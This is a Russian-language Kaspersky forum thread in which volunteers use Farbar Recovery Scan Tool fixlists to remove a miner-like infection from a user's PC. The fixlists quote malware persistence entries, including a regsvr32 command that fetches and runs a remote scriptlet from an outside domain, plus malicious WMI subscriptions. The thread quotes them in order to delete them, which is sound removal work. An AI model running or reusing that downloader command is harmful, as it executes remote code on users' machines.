Перейти к содержанию
Правила раздела
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

Автозапуск вируса

Роман Паятелев

Автор Роман Паятелев
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Роман Паятелев Новичок

Роман Паятелев

Опубликовано
Опубликовано (изменено)

Добрый день. Ситуация следующая. Однажды появился данный вирус(conhost он же ТОДО с китайскими иероглифами). Появляется он стабильно после включения или перезагрузки компьютера. Его можно убить из диспетчера задач, но он появится в след. раз снова. Боролся по-всякому. Удалял браузеры.

CollectionLog-2019.09.04-20.17.zip

Изменено пользователем Роман Паятелев
Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Ссылка на комментарий
Поделиться на другие сайты
Роман Паятелев Новичок

Роман Паятелев

Опубликовано
  • Автор
Опубликовано

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

 

FRST.rar

Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Здравствуйте,

 

Удалите остатки от антивируса Avast утилитой Avast Remover.

 

Уточните пожалуйста файл лога FRST.txt вы изменяли, он похоже модифицирован и не содержит необходимой информации?

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

    Start::
CMD: wmic /Namespace:\\root\default Path SystemRestore Call Enable "%SystemDrive%"
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> No File
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
AlternateDataStreams: C:\Users\User:Heroes & Generals [38]
MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
MSCONFIG\startupreg: YandexSearchBand => 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms76AF3F80App => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms76AF3F80App => ""="Service"
FirewallRules: [{3D3BB43E-1723-4CE7-8CB4-76D21585FB55}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\App Game Kit 2\Tier 1\Editor\bin\AGK.exe No File
FirewallRules: [{F0EED018-801A-47D2-9B5D-8268B85DA5D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\App Game Kit 2\Tier 1\Editor\bin\AGK.exe No File
FirewallRules: [{30333612-3E05-4C90-9AE3-8241377CD90F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{E5550760-7B40-4A2B-BEDC-16C0B4A31DD6}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [TCP Query User{B35CC72B-0E5E-47B2-8388-EAC2EDA85972}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [UDP Query User{EDB2F4EA-882C-49A3-90A4-07C3FB89FDAC}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [TCP Query User{6E42B419-15EB-4324-95F5-90C4471279C9}C:\games\ghost recon future soldier\future soldier dx11.exe] => (Block) C:\games\ghost recon future soldier\future soldier dx11.exe No File
FirewallRules: [UDP Query User{E7647E94-F36D-4301-8D56-A787F339D576}C:\games\ghost recon future soldier\future soldier dx11.exe] => (Block) C:\games\ghost recon future soldier\future soldier dx11.exe No File
FirewallRules: [TCP Query User{82FB278C-6609-463D-A82D-3E39A793F1CF}C:\games\ghost recon future soldier\future soldier dx9.exe] => (Allow) C:\games\ghost recon future soldier\future soldier dx9.exe No File
FirewallRules: [UDP Query User{CE2DD9B0-A775-4B83-9315-D33D38892916}C:\games\ghost recon future soldier\future soldier dx9.exe] => (Allow) C:\games\ghost recon future soldier\future soldier dx9.exe No File
FirewallRules: [TCP Query User{14D23D21-3147-4E29-BE5C-3574C93D43F8}C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe] => (Allow) C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe No File
FirewallRules: [UDP Query User{1A898B4C-5F09-4EB4-8AC9-04853F2447D4}C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe] => (Allow) C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe No File
FirewallRules: [TCP Query User{20730BF1-65A1-4BDC-BF15-069E09E17D53}C:\games\call of duty black ops 2\t6sp.exe] => (Allow) C:\games\call of duty black ops 2\t6sp.exe No File
FirewallRules: [UDP Query User{96C8CC29-1412-47B4-BE06-A6472D482CAD}C:\games\call of duty black ops 2\t6sp.exe] => (Allow) C:\games\call of duty black ops 2\t6sp.exe No File
FirewallRules: [TCP Query User{4CA55C6C-B45F-48F6-987C-F996FE6EA284}C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe] => (Block) C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe No File
FirewallRules: [UDP Query User{BA21F38D-A0FA-497B-BFCD-DC14954C9AA3}C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe] => (Block) C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe No File
FirewallRules: [{2F32C00F-FE42-4577-8A27-DBDD55C4FF2E}] => (Block) %SystemRoot%\System32\regsvr32.exe No File
Reboot:
End::
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Приложите пожалуйста новые логи и убедитесь, чтобы были выбраны необходимые галочки.

 

 

- Скачайте Farbar Recovery Scan Tool FRST_Icon.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".

    FRST.png

  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

    Start::
CreateRestorePoint:
CloseProcesses:
Task: {044A6734-E90E-4F8F-B357-B2DC8AB3B5EC} - \Microsoft\Windows\Time Synchronization\SynchronizeTime -> No File <==== ATTENTION
Task: {0667B506-B267-4269-9C43-CB5FE686ADF2} - \Microsoft\Windows\Media Center\InstallPlayReady -> No File <==== ATTENTION
Task: {07FC3CAD-0F41-4019-A153-4D21BABA7374} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
Task: {088482FA-65B8-4E17-9ABF-1DCD48E8D373} - \Microsoft\Windows\Tcpip\IpAddressConflict1 -> No File <==== ATTENTION
Task: {09F06BFE-A3C8-40E3-846A-6E6F4000C238} - \Microsoft\Windows\Tcpip\IpAddressConflict2 -> No File <==== ATTENTION
Task: {0ADDB149-AC5A-4049-9432-C23C255D79CA} - \Microsoft\Windows\Media Center\PBDADiscoveryW2 -> No File <==== ATTENTION
Task: {128FFC31-659E-4AAC-B398-5FA8F02D21F4} - \Microsoft\Windows\Media Center\OCURActivate -> No File <==== ATTENTION
Task: {14FA545C-FE85-43BE-A05B-3B19227EFD92} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver -> No File <==== ATTENTION
Task: {1F7B7221-AE8F-44F3-BA82-F7D260F51964} - \Microsoft\Windows\Task Manager\Interactive -> No File <==== ATTENTION
Task: {2470470F-2634-478E-B181-571E98A789BB} - \Microsoft\Windows\Multimedia\SystemSoundsService -> No File <==== ATTENTION
Task: {250FE810-B8DA-45A1-9DEB-D645F3B75112} - \Microsoft\Windows\Media Center\PvrRecoveryTask -> No File <==== ATTENTION
Task: {28011108-68DF-4C73-B91B-57427D501BBA} - \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) -> No File <==== ATTENTION
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {35E235FF-EA95-42B7-8E16-D7FBE47A5DA7} - \Microsoft\Windows\Media Center\PeriodicScanRetry -> No File <==== ATTENTION
Task: {432FCF52-F91E-4776-B653-776DFC9321E9} - \Microsoft\Windows\Media Center\OCURDiscovery -> No File <==== ATTENTION
Task: {47536D45-EEEC-4BDC-8183-A4DC1F8DA9E4} - \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip -> No File <==== ATTENTION
Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - \Microsoft\Windows\Shell\WindowsParentalControlsMigration -> No File <==== ATTENTION
Task: {4A2977B6-DC6A-418B-B4E4-BFB0FC48E8C4} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
Task: {4C8B01A2-11FF-4C41-848F-508EF4F00CF7} - \Microsoft\Windows\TextServicesFramework\MsCtfMonitor -> No File <==== ATTENTION
Task: {527B421B-223E-4E97-9DA0-B62FE69DA565} - \DelayedItemsByChemtableSoftware\Steam -> No File <==== ATTENTION
Task: {52E1C4EB-1896-48B8-8E7B-6E6F23B99A2D} - \Microsoft\Windows\SideShow\AutoWake -> No File <==== ATTENTION
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - \Microsoft\Windows\UPnP\UPnPHostConfig -> No File <==== ATTENTION
Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - \Microsoft\Windows\Shell\WindowsParentalControls -> No File <==== ATTENTION
Task: {5C0AEEEA-C154-45BE-8499-BEA5F11BAFF6} - \Microsoft\Windows\Defrag\ScheduledDefrag -> No File <==== ATTENTION
Task: {5F5A18EB-DC73-4E45-A11C-B59043598412} - \Microsoft\Windows\CertificateServicesClient\SystemTask -> No File <==== ATTENTION
Task: {60770713-E09B-4881-B7B6-713A452D1AD0} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
Task: {613612BA-897D-44CE-8DC1-8FC283F9FD51} - \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) -> No File <==== ATTENTION
Task: {6738BA6E-EA75-4B6B-B8B8-71F0336DD8EF} - \Microsoft\Windows\User Profile Service\HiveUploadTask -> No File <==== ATTENTION
Task: {695F1CCC-602E-4224-8D99-65355D6197C3} - \Microsoft\Windows\SideShow\SystemDataProviders -> No File <==== ATTENTION
Task: {6F1D42A0-9F65-4ADD-876B-2DD80ED421BE} - \Microsoft\Windows\SideShow\GadgetManager -> No File <==== ATTENTION
Task: {72DB7465-BC54-491B-A92A-4637A28C9BBF} - \Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck -> No File <==== ATTENTION
Task: {74B0AEDF-610B-487C-8EFD-856E43036654} - \Microsoft\Windows\Media Center\PBDADiscovery -> No File <==== ATTENTION
Task: {753C47AE-EC5E-44B3-95A9-2C8E553F0E39} - \Microsoft\Windows\Windows Media Sharing\UpdateLibrary -> No File <==== ATTENTION
Task: {7AFCC0CA-7121-422A-AB45-B0E8D599FF08} - \Microsoft\Windows\CertificateServicesClient\UserTask -> No File <==== ATTENTION
Task: {81540B9F-B5BF-47EB-9C95-BE195BF2C664} - \Microsoft\Windows\NetTrace\GatherNetworkInfo -> No File <==== ATTENTION
Task: {940597BC-0A65-480F-B04C-CDCD30E9F810} - \{CA815833-F057-4881-9106-447D7CC2B2F9} -> No File <==== ATTENTION
Task: {9435F817-FED2-454E-88CD-7F78FDA62C48} - \Microsoft\Windows\WDI\ResolutionHost -> No File <==== ATTENTION
Task: {94AAB8D1-0119-4F41-A22A-3C9485BF07B1} - \Microsoft\Windows\Media Center\DispatchRecoveryTasks -> No File <==== ATTENTION
Task: {95050995-4F3F-4812-9E55-C7620347FEDE} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector -> No File <==== ATTENTION
Task: {968B86ED-5DDB-4106-819D-38230D552AC0} - \Microsoft\Windows\Media Center\ReindexSearchRoot -> No File <==== ATTENTION
Task: {994C86AD-A929-4B2C-88A0-4E25A107A029} - \Microsoft\Windows\SystemRestore\SR -> No File <==== ATTENTION
Task: {9979CB83-103A-4105-9E5D-C74B0AF6D198} - \Microsoft\Windows\CertificateServicesClient\UserTask-Roam -> No File <==== ATTENTION
Task: {9CFDC729-26B1-4627-A009-1A9C0B5FB704} - \Microsoft\Windows\SideShow\SessionAgent -> No File <==== ATTENTION
Task: {A2A0B92B-F34C-444B-A6E5-F25C69C4001B} - \Microsoft\Windows\MobilePC\HotStart -> No File <==== ATTENTION
Task: {A35BB7A6-5F0C-4C9F-8450-2B3BED532D51} - \Microsoft\Windows\WindowsColorSystem\Calibration Loader -> No File <==== ATTENTION
Task: {A48CABBF-24C8-4B87-B00F-9261807C3B43} - \Microsoft\Windows\AppID\PolicyConverter -> No File <==== ATTENTION
Task: {A6AF9377-77CE-47AB-AD7D-EC32CAD0C82D} - \Microsoft\Windows\Location\Notifications -> No File <==== ATTENTION
Task: {A7C73732-9F11-4281-8D19-764D4EC9D94D} - \Microsoft\Windows\Application Experience\ProgramDataUpdater -> No File <==== ATTENTION
Task: {AB7AEE87-1554-4EA0-BFBB-574A380515D2} - \Microsoft\Windows\Media Center\mcupdate -> No File <==== ATTENTION
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {AC668097-4D6B-4093-AC14-014C09DBF820} - \Microsoft\Windows\Ras\MobilityManager -> No File <==== ATTENTION
Task: {AC96F495-6AD3-4A88-AFB9-0BCF8D1B65EA} - \Microsoft\Windows\Media Center\ehDRMInit -> No File <==== ATTENTION
Task: {AE8FCFF7-660D-46A5-B939-126915D7E8BD} - \klcp_update -> No File <==== ATTENTION
Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor -> No File <==== ATTENTION
Task: {B5E2650A-61CB-4E2C-8913-DF20F9EB1A40} - \Microsoft\Windows\Offline Files\Background Synchronization -> No File <==== ATTENTION
Task: {BC4F9900-E41A-4F52-8E12-4BB0941E2094} - \Microsoft\Windows\Media Center\UpdateRecordPath -> No File <==== ATTENTION
Task: {BCE52A56-C5BA-47DD-9E89-C932093C9E7C} - \Microsoft\Windows\Media Center\RecordingRestart -> No File <==== ATTENTION
Task: {BE669C13-8165-4536-96D0-6D6C39292AAE} - \Microsoft\Windows\Diagnosis\Scheduled -> No File <==== ATTENTION
Task: {C016366B-7126-46CA-B36B-592A3D95A60B} - \Microsoft\Windows\Customer Experience Improvement Program\Consolidator -> No File <==== ATTENTION
Task: {C493322E-396C-4313-A684-097E2C44D451} - \Microsoft\Windows\Media Center\PBDADiscoveryW1 -> No File <==== ATTENTION
Task: {CA4B8FF2-A4D2-4D88-A52E-3A5BDAF7F56E} - \Microsoft\Windows\Registry\RegIdleBackup -> No File <==== ATTENTION
Task: {CB3D64BF-C0C9-45FF-BFB0-FF1A8F680186} - \Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask -> No File <==== ATTENTION
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {D0250F3F-6480-484F-B719-42F659AC64D5} - \Microsoft\Windows\Windows Error Reporting\QueueReporting -> No File <==== ATTENTION
Task: {D21ABCD6-787A-4A0B-B1EA-BA04EA60FD13} - \Microsoft\Windows\Media Center\RegisterSearch -> No File <==== ATTENTION
Task: {D385E4DB-B868-471B-813E-358466A554EA} - \Microsoft\Windows\Media Center\ConfigureInternetTimeService -> No File <==== ATTENTION
Task: {D7B6E81D-3CF4-432C-84D2-24213F4316E6} - \Microsoft\Windows\Autochk\Proxy -> No File <==== ATTENTION
Task: {D9B52DA8-36E4-43CF-856F-AFC2F35C4D1D} - \Microsoft\Windows\Media Center\ActivateWindowsSearch -> No File <==== ATTENTION
Task: {DA41DE71-8431-42FB-9DB0-EB64A961DEAD} - \Microsoft\Windows\Maintenance\WinSAT -> No File <==== ATTENTION
Task: {E22A8667-F75B-4BA9-BA46-067ED4429DE8} - \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange -> No File <==== ATTENTION
Task: {E3163C33-301D-4730-A266-5518C5ED3967} - \Microsoft\Windows\Bluetooth\UninstallDeviceTask -> No File <==== ATTENTION
Task: {E5F3CC87-A17B-4BF6-A1F1-47C2E5C43F99} - \update-S-1-5-21-4018456726-538124734-3878147103-1000 -> No File <==== ATTENTION
Task: {E806CBBB-3E4A-473C-BE13-7A21D4B2FC98} - \Microsoft\Windows\Offline Files\Logon Synchronization -> No File <==== ATTENTION
Task: {EACA24FF-236C-401D-A1E7-B3D5267B8A50} - \Microsoft\Windows\RAC\RacTask -> No File <==== ATTENTION
Task: {EB02381F-D652-4B1C-894A-712498C62C51} - \Microsoft\Windows\MUI\LPRemove -> No File <==== ATTENTION
Task: {F430E82D-0A8F-4634-9224-6D5553B6901F} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Task: {FB3C354D-297A-4EB2-9B58-090F6361906B} - \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem -> No File <==== ATTENTION
Task: {FBCC8FEA-19E0-496A-9329-B4BEB64343D6} - \update-sys -> No File <==== ATTENTION
Task: {FDD56C73-F0D5-41B6-B767-6EFFD7966428} - \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask -> No File <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d60e96af-803d-4c2f-b2ec-5e8d508ac80f} <==== ATTENTION (Restriction - IP)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
File: C:\Windows\System32\Ms76AF3F80App.dll
S2 Ms76AF3F80App; C:\Windows\System32\Ms76AF3F80App.dll [X]
S2 mssecsvc2.0; no ImagePath
S2 mssecsvc2.1; no ImagePath
File: C:\Windows\System32\drivers\nvvad64v.sys
File: C:\Windows\System32\DRIVERS\nvvhci.sys
2019-09-04 19:35 - 2018-11-08 01:44 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-09-04 19:34 - 2018-09-20 22:58 - 000000081 _____ C:\Windows\system32\s
2019-09-04 19:34 - 2018-09-20 22:58 - 000000079 _____ C:\Windows\system32\ps
2019-09-04 19:34 - 2018-09-20 22:58 - 000000077 _____ C:\Windows\system32\p
2018-11-05 12:48 - 2018-12-13 17:38 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
2018-11-08 01:44 - 2019-09-04 19:35 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms76AF3F80App => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_76AF3F80.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms76AF3F80App => ""="Service"
MSCONFIG\startupreg: YandexSearchBand => 
FirewallRules: [TCP Query User{B8E8EBB8-A444-4C32-94C6-592C97AC1596}C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe] => (Allow) C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe No File
FirewallRules: [UDP Query User{FF4D1921-11A0-4C14-90AE-C5959245EED6}C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe] => (Allow) C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe No File
Reboot:
End::
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Если проблема более вас не беспокоит, то выполните завершающий эпат.

 

В завершение:

1.

 

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.

Компьютер перезагрузится.

 

Остальные утилиты лечения и папки можно просто удалить.

 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • .gaudi
      Автозапуск терминала
      Автор .gaudi
      Добрый день!
       
      Возникла проблема. Каждый раз, когда включаю компьютер после завершения работы, режима сна или любого другого выключения, автоматически открывается окно терминала. В нем всего две строки. Обе гласят "Команда выполнена". Какая конкретно команда, не пишет. Товарищ предположил, что это может быть майнер. Пользуюсь подпиской Kaspersky Plus. Неоднократно проводил полную проверку, но антивирус проблемы не видит.
       
      Может ли это быть вирус, и, если да, как с ним бороться? 

      также выполнил полную проверку при помощи сервисов Dr. Web и ESET Online Scanner, они также не выявили проблемы

      Заранее спасибо.
    • kazakova
      вирус banta
      Автор kazakova
      Добрый день! Подверглись вирусной атаке, все необходимые файлы приложила, пароль на архив 123. Есть ли возможность восстановить файлы?
       
       
       
       
      логи.rarфайлы_зашифрованные.rarфайлы_шифровальщика.rar
    • composer1995
      [РЕШЕНО] Вирус CAAServices.exe
      Автор composer1995
      Добрый день!

      Столкнулся с вирусом CAAServices.exe. Изложу последовательно события и свои действия:

      1. Центр обновления Windows установил обновления (не знаю, связано ли это с дальнейшей проблемой)
      - Накопительное обновление для Windows 11 Version 24H2 для систем на базе процессоров x64, 2025 07 (KB5062553)
      - 2025-07 Накопительное обновление .NET Framework 3.5 и 4.8.1 для Windows 11, version 24H2 для x64-разрядных систем (KB5056579)

      2. После обновления комп перезагрузился и в простое на рабочем столе начал сильно шуметь. Я решил проверить диспетчер задач и заглянуть в автозагрузки. В этот момент комп уже остыл и вернулся к нормальному уровню шума. В списке автозагрузок обнаружил файл CAAServices.exe, расположение файла C:\ProgramData\CAAService

      3. Нагуглил, что это майнер, провёл проверку защитником Windows, обнаружил вирус:
      - Trojan:Win64/DisguisedXMRigMiner!rfn, затронутые элементы C:\ProgramData\CAAService\Microsoft Network Realtime lnspection Service.exe

      Далее, в исключениях обнаружил CAAServices.exe, убрал его из списка исключений. Вручную указал папку CAAService, и в ней он нашёл:
      - Trojan:Win32/Wacatac.H!ml, затронутые элементы C:\ProgramData\CAAService\CAAServices.exe

      Защитник удалил оба вируса. После рестарта компа в автозагрузках снова обнаружил этот CAAServices.exe. Повторил процедуру по поиску и удалению вируса, комп не перезагружал.

      4. Пришёл сюда на сайт, провёл проверку Kaspersky Virus Removal Tool, обнаружил два вируса (прикладываю скрин). После проверки данной утилитой и рестарта компа в автозагрузке майнер не появляется. В папке C:\ProgramData\CAAService исчез файл CAAServices.exe. Остались только файлы CAAServices.vdr и OpenCL.dll.

      5. Собрал логи с помощью AutoLogger, прикладываю архив.

      Скажите, пожалуйста, избавился ли я от майнера, или нужно предпринять ещё какие-то меры?

      CollectionLog-2025.07.10-12.42.zip
    • sekvoya
      [РЕШЕНО] Подозрение на ВИРУС
      Автор sekvoya
      В браузере появляется расширение AdBlock, которое ломает разметку. При удалении расширения все становится нормально. Однако, после перезапуска ПК, расширение появляется в браузере вновь. Также в папке Temp появляется папка, которую нельзя удалить "2xzjmmugjeoboytjoc0goumkkhc"
      CollectionLog-2025.07.05-18.18.zip
    • sasaks11
      Вирус
      Автор sasaks11
      Добрый день! Аналогичная ситуация с человеком в теме... Ещё было замечено что скачиваемые файлы на следующий день также повреждаются. Могу ли я решить проблему действуя по представленным здесь шагам или требуется индивидуальное решение?
      Сканирование проводилось с помощью встроенного в майкрософт 11 антивируса. Он ничего не обнаружил ни при полной проверке, ни при быстрой, ни при автономной проверке (Microsoft Defender).

       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
×
×
  • Создать...